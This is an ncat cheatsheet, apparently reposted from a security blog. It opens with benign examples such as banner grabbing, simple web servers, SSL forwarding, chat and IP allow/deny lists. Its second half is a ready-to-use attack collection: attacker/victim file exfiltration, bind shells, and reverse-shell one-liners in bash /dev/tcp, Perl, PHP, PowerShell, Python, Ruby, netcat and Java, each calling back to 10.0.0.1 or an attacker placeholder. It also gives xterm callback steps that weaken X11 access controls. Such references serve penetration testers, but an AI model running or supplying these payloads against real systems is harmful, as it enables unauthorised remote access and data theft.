@PR1V8 - Ncat Cheatsheet
@pr1v8_null
Man Page
Name ncat — Concatenate and redirect sockets Synopsis ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]
Banner Grab
printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80 HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 19 Dec 2017 20:01:10 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: https://bitrot.sh/ <html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html>
SSL Banner Grab
printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl HTTP/1.1 200 OK Server: nginx Date: Tue, 19 Dec 2017 20:01:59 GMT Content-Type: text/html Content-Length: 28379 Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT Connection: close ETag: "5a3930dd-6edb" Accept-Ranges: bytes <!DOCTYPE html> <html lang="en"> ...
Simple Web Server
echo '<html><body>This is ncat webserver</body></html>' > stuff.html ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"
Once the ncat command is running navigate to web browser and point it to localhost.
Accept multiple requests
ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"
A Better HTTP Server
There’s a neat Lua script that takes advantage of ncat’s ability to interact with the language. The script can be found here. Try saving it to /tmp/httpd.lua
Navigate to a directory with .html files in it, and run the following command.
ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open
Unwrap SSL Connections
Server
Listen on port 6666 as a plain text server. Upon connection, connect to api.ipify.org:443 using SSL and forward client / server traffic. It also saves the full session to out.log for later analysis.
ncat -l -p 6666 -c 'ncat --ssl api.ipify.org 443' --keep-open -o out.log
Client
Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to api.ipify.org:443 using SSL.
curl 'http://localhost:6666?format=json' -H 'Host: api.ipify.org'
Connect two incoming connections
ncat -l -p 8080 -c 'ncat -l -p 9090'
Connect two listening servers
This can have some very interesting results.
ncat localhost 8080 -c 'ncat localhost 9090'
For more, check out our pivoting cheatsheet.
Telnet
ncat -t 192.168.1.1 23
Simple Chat
Server
ncat -l 1234 --chat
Client(s)
ncat localhost 1234
Copy Files with UDP
Server
ncat -l 6666 --udp
Client
ncat -udp localhost 6666 < stuff.py
Access Controls
Whitelist IPs
ncat -l -p 8080 --allow 192.168.1.1
Whitelist from file
Hosts should be separated by new lines
ncat -l -p 8080 --allowfile hosts
Blacklist IPs
ncat -l -p 8080 --deny 192.168.1.1,10.10.0.1
Blacklist IPs from file
Hosts should be separated by new lines
ncat -l -p 8080 --denyfile hosts
File Transfer with SSL
Reverse file transfer to attacker
Attacker
ncat -l -p 6666 --ssl > outputfile
Victim
ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat
File send w/ Sender listening
Attacker
ncat -l -ssl -p 6666 --send-only < /bin/ncat
Victim
ncat localhost 6666 --ssl > outputfile
Bind Shell
Linux
ncat -l 6666 -e /bin/sh
Windows
ncat -l 6666 -e cmd
Reverse Shell
Victim
ncat <attacker ip address> 6666 -e /bin/sh
Attacker
ncat -l -p 6666
Victim machine doesn’t have ncat?
Bash
bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP
php -r '$sock=fsockopen("10.0.0.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()
Python 2.7 and 3
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 6666
Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.
allowed_users=anybody
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest -ac :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
Resources
http://www.irongeek.com/i.php?page=videos/ncat-nmap-netcat
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/Snifer/security-cheatsheets/blob/master/reverse-shell
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1
====================
Post original: https://bitrot.sh/cheatsheet/19-12-2017-ncat/
Telegra.ph por: https://t.me/pr1v8